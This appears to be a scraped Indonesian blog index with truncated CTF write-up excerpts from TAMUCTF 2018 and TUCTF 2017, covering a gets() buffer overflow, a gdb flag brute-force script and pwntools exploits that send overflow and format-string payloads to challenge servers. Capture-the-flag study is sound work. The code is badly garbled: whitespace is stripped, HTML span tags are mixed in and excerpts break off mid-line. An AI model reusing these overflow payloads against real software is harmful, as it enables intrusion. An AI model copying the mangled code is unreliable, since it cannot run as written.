TAMUCTF 2018 - Pwning

Pwn1 Diberikan sebuah file binary dengan informasi sebagai berikut Percobaan debugging menggunakan gdb $ gdb -q pwn1 Reading symbols from pwn1…(no debugging symbols found)…done. gdb-peda $ pdisass main Berikut hasil disassembly fungsi main 0x080485cf <+29>: call 0x8048410 <setvbuf@plt> 0x080485d4 <+34>: add esp,0x10 0x080485d7 <+37>: sub esp,0xc 0x080485da <+40>: push 0x8048700 0x080485df <+45>: call 0x80483f0 <puts@plt> 0x080485e4 <+50>: add esp,0x10 0x080485e7 <+53>: sub esp,0xc 0x080485ea <+56>: push 0x8048720 0x080485ef <+61>: call 0x80483f0 <puts@plt> 0x080485f4 <+66>: add esp,0x10 0x080485f7 <+69>: sub esp,0xc 0x080485fa <+72>: push 0x804875f 0x080485ff <+77>: call 0x80483f0 <puts@plt> 0x08048604 <+82>: add esp,0x10 0x08048607 <+85>: mov DWORD PTR [ebp-0xc],0x0 0x0804860e <+92>: sub esp,0xc 0x08048611 <+95>: lea eax,[ebp-0x23] 0x08048614 <+98>: push eax 0x08048615 <+99>: call 0x80483d0 <gets@plt> 0x0804861a <+104>: add esp,0x10 0x0804861d <+107>: cmp DWORD PTR [ebp-0xc],0xf007ba11 0x08048624 <+114>: jne 0x804862d <main+123> 0x08048626 <+116>: call 0x804854b <print_flag> 0x0804862b <+121>: jmp 0x804863d <main+139> 0x0804862d <+123>: sub esp,0xc 0x08048630 <+126>: push 0x8048772 0x08048635 <+131>: call 0x80483f0 <puts@plt> 0x0804863a <+136>: add esp,0x10 0x0804863d <+139>: mov eax,0x0 0x08048642 <+144>: mov ecx,DWORD PTR [ebp-0x4] 0x08048645 <+147>: leave 0x08048646 <+148>: lea esp,[ecx-0x4] 0x08048649 <+151>: ret Terlihat terdapat penggunaan fungsi gets() yang rentan terhadap buffer overflow, karena gets() tidak membatasi panjang input yang ditulis ke buffer di [ebp-0x23].

TUCTF 2017 - Write up

gdb.execute("b 0x0000000000401c82")whileTrue:forcinchar_set:pattern=flag+c+"A"(55-len(flag))gdb.execute("r {}“.format(pattern))foriinrange(len(flag)):gdb.execute("c")rax=gdb.execute("p/x $rax",True,True).split()[-1]ifrax=="0x0":flag+=cif”}“inflag:print("Flag : %s"%(flag))exit(0)print("Curret Flag : %s"%(flag))sleep(1)breakprint("Pattern : %s"%(pattern))print("Nilai Rax : %s"%(rax))vuln=remote("vulnchat.tuCTF.com",4141)payload="A"20+p32(0x00007325)# overwrite with “%s"vuln.sendlineafter("Enter your username: “,payload)payload2="A"49+p32(0x804856b)vuln.sendlineafter(”: “,payload2)printvuln.recvall()flag="\x72"vuln2=remote("vulnchat2.tuCTF.com",4242)vuln2.sendlineafter("Enter your username: “,"AAAA")vuln2.recvuntil("AAAA: “)payload="A"*43+flagvuln2.send(payload)printvuln2.recv(1024)never=remote("neverending.tuCTF.com",12345)char_set="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 !"#$%&'()*+,-./:;<=>?@[]^_`{|}~</span>s"defround1(char="A"):never.sendlineafter("text:“,char)enc_base=never.recvline().split("is “)[1]enc_msg=never.recvline().split("is “)[1]enc_msg=enc_msg.split(” decrypted?\n")[0]log.info("ENC BASE : -> {}“.format(enc_base))log.info("ENC MSG : -> {}“.format(enc_msg))cal=ord(char)-ord(enc_base[0])dec="“.join([chr(ord(b)+cal)forbinenc_msg])<span class="n">non_printable</span> <span class="o">=</span> <span class="p">[</span> <span class="nb">chr</span><span class="p">(</span><span class="nb">ord</span><span class="p">(</span><span class="n">z</span><span class="p">))</span> <span class="k">for</span> <span class="n">z</span> <span class="ow">in</span> <span class="n">dec</span> <span class="k">if</span> <span class="n">z</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">char_set</span><span class="p">]</span> <span class="n">printable</span> <span class="o">=</span> <span class="s">""</span><span class="o">.

TUCTF 2017 - Writeup

Reversing 200 (Unknown) Diberikan file ELF 64 bit stripped. Berikut hasil dekompilasi fungsi main signed __int64 __fastcall main(int a1, char **a2, char **a3) { signed __int64 result; // rax@2 unsigned int i; // [sp+14h] [bp-Ch]@5 char *v5; // [sp+18h] [bp-8h]@5 if ( a1 == 2 ) { if ( strlen(a2[1]) == 56 ) { v5 = a2[1]; for ( i = 0; i < 0x38; ++i ) { if ( (unsigned int)sub_401E90((__int64)v5, i) ) dword_603084 = 1; } if ( dword_603084 ) puts("Nope.

Write Up Cyber Jawara 2017
